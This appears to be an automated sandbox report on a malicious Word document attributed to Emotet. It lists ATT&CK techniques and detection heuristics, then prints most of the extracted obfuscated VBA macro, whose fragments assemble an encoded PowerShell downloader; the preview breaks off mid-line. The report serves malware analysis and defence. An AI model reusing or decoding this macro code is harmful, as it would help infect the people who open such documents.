Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function that calls Shell(). The macro executes a PowerShell command reconstructed from concatenated string fragments, which likely downloads and executes a second-stage payload. The ClamAV detection name also strongly suggests the Emotet family.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6878585-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6878585-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10922 bytes | d5651a954127d0143cbfee8faf12ee7f2f51be7c0e331b49e9d2f9c2b273fb46 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "MwvQXlFYLAM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TWsSKiaVwtTDK"
Function CWqiKVjzwIw()
On Error Resume Next
istiG = 56728
jHRjQ = CDate(TLqnH + Sin(37310 + 41363) * 25455 * CInt(6068))
DaIcE = pPjjGi
ikKiY = CDate(27474)
BbJrL = CByte(vitsKh)
MooXRt = 44754
DizHtnk = "OwerSHe" + "ll " + ". " + "( " + "$VErBoS" + "eprefEREnCE"
CpddLW = 5245
uOoPj = CDate(wdzFz + Sin(37873 + 98856) * 67727 * CInt(59444))
UzzcYo = ttkbHX
CCkBp = CDate(12949)
krLGf = CByte(GEPlMs)
JaaDik = 78465
djUAjOX = ".tOStRI" + "nG()[1,3]" + "+'X'" + "-JOIN'')("
HiDWLO = 52525
XImYc = CDate(wviTFA + Sin(84042 + 85632) * 70115 * CInt(18596))
AwzpEl = aYomW
hqFICI = CDate(80707)
tjXNPB = CByte(inGkvV)
XWdcFK = 76649
KHPjUcwpYPU = " ('21" + "F70e9" + "4P88Z114e121P91" + "r17F12P17F95w84" + "@70l" + "28r94l83w91_84" + "P82F69G1"
EPYmHk = 26852
zUhVik = CDate(kTzhUR + Sin(10318 + 33061) * 99517 * CInt(61745))
PFUMqs = wsUZTS
zEoMYm = CDate(23080)
HoGwh = CByte(KqjTW)
YNfrXQ = 80902
rPjKhISTXSj = "7r6" + "7@80l" + "95P85l" + "94G92@10@21G1" + "19F" + "75r103G71l" + "101@10" + "0F17P" + "12_1"
plMLI = 92768
isvMRf = CDate(pIGqiA + Sin(64244 + 71454) * 75346 * CInt(39442))
wJnIS = bFTOW
HLAfwQ = CDate(3089)
nojwXG = CByte(kipdm)
aZXilB = 26475
StbXGlIvONn = "7@" + "95Z84w70@28r9" + "4l83P91@84F8" + "2G69l17G98l72r6" + "6Z69_84Z92" + "r31w1" + "27F84F" + "69@31e102_84e" + "83F114l93P88_84"
RRjhBA = 71776
pZoCi = CDate(Wzrmj + Sin(36397 + 46462) * 27597 * CInt(86833))
JsHTUR = WvBsPd
MMhSEQ = CDate(8549)
DrZaNK = CByte(RrtWZo)
mFbKvW = 66637
dDvrlZJQiMs = "l95Z69F10r21w" + "103_127l7" + "5@95F11" + "8e17@12w" + "17Z2" + "2P8"
nXnQX = 73569
SjqMs = CDate(zQjZb + Sin(29244 + 2201) * 62903 * CInt(50274))
uwkUFI = fiNSEu
GhQHV = CDate(28674)
VMwStI = CByte(JkBXn)
cYusC = 70376
jwDfQzXfnz = "9r69_69w6" + "5r11Z30Z30" + "P90l67G68" + "l87G86_64l66w65"
OYzZV = 62794
EclInT = CDate(VtKLi + Sin(75543 + 10822) * 41182 * CInt(52538))
XCmbms = OBKDv
LiijvV = CDate(51055)
ZImlj = CByte(VLkuOJ)
laqJu = 49954
vAWXQTXpUX = "l31P" + "82e94@9" + "2@30G123_8Z121" + "P9w" + "91e30F" + "113@89@6" + "9P69e65e11r3" + "0Z30Z93w84_"
PHQEn = 33731
mjNkoa = CDate(fiZlv + Sin(16550 + 95637) * 77241 * CInt(7681))
qsErF = PCzRi
jumIFZ = CDate(74540)
DazFMD = CByte(XTnKS)
csYMp = 82608
pBOPfDIRLS = "89P68@68G89_88G" + "84F68F31@82e9" + "4@92@" + "30G114Z9" + "9_93w101l88" + "@70Z100e30@11" + "3w89" + "e69r69@65@" + "11w30_30@"
UbSavD = 61774
SVrUj = CDate(UjSOHw + Sin(32044 + 95852) * 81083 * CInt(60252))
fcXLs = WilTln
whrIW = CDate(48386)
YXalG = CByte(EOhhFj)
jVYdzs = 79010
pWwPz = "85P80w88_89@" + "80@6" + "9Z66Z68G80e67e" + "92Z80P85@80P65Z" + "68w67F70@94r90"
CWqiKVjzwIw = DizHtnk + djUAjOX + KHPjUcwpYPU + rPjKhISTXSj + StbXGlIvONn + dDvrlZJQiMs + jwDfQzXfnz + vAWXQTXpUX + pBOPfDIRLS + pWwPz
End Function
Function amNPIo()
On Error Resume Next
KYuaa = 45073
pCmzQZ = CDate(JrwQv + Sin(54020 + 41163) * 87511 * CInt(54847))
LrhRYV = LTKfi
vdjwmu = CDate(61036)
GPZICV = CByte(tBCZmU)
FIOUw = 35596
PYOcd = "l84" + "@67F69@94G31F82" + "F94@92" + "F30e5@" + "87" + "l114@72l2F" + "70@" + "112_"
NrqiXI = 58253
sBBvWG = CDate(FoHZNs + Sin(89997 + 74137) * 16941 * CInt(71165))
YLjVwL = qAPIn
VnwPoi = CDate(37450)
WYKZkG = CByte(bCzOR)
DFDar = 21047
YRcBVki = "30e113" + "e89@69F69" + "@65" + "P11Z30r" + "30_"
XNUch = 71242
CQOAG = CDate(YhOHGW + Sin(10901 + 6114) * 49485 * CInt(27569))
JsHjm = TSriu
fGRzAV = CDate(23266)
naBoi = CByte(GHDWEp)
AiVOq = 78825
iArFZcc = "3F1Z3w31_7_2e" + "31_0" + "G1l4w31F9l7" + "e30l112Z" + "91P120l1"
GIOEGw = 42872
qtmtY = CDate(Pbfmj + Sin(47855 + 17944) * 94549 * CInt(84937))
zLGNK = XrXuVB
IvhOz = CDate(57910)
PzTjcj = CByte(dqcFm)
moXMi = 51097
FaDTEQvtwf = "26_94G97P30@11" + "3w89w69e69" + "_65@11" + "F3"
iM
... (truncated)